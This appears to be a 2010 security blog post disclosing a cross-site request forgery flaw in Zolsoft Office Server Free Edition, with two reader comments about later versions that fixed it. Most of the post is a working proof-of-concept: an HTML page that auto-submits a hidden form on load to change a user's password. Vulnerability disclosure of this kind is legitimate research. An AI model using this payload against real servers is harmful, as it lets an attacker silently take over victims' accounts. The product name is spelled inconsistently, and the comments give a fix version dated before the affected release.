This site is soon to be deprecated by http://www.johnleitch.net

Thursday, May 6, 2010

Zolsoft Office Server Free Edition 2010.0502 XSRF

A cross-site request forgery vunlerability in the Zoloft Office Server Web UI can be exploited to change the password of a user.


<html>
<body onload="document.forms[0].submit()">
    <form action="http://localhost/options3.htm" method="post">
       <input type="hidden" name="PassField1" value="new_password" />
       <input type="hidden" name="PassField2" value="new_password" />       
    </form>
</body>
</html>
Posted by John Leitch at 5:30 PM
Labels: , , , ,

2 comments:

  1. AnonymousJune 25, 2010 at 4:58 PM

    Version 2010.0120: Fixed the cross-site request bug in the Web service.

    ReplyDelete
  2. AnonymousJune 25, 2010 at 5:01 PM

    Version 2010.0625: Fixed the cross-site request bug in the Web service.

    ReplyDelete

Subscribe to: Post Comments (Atom)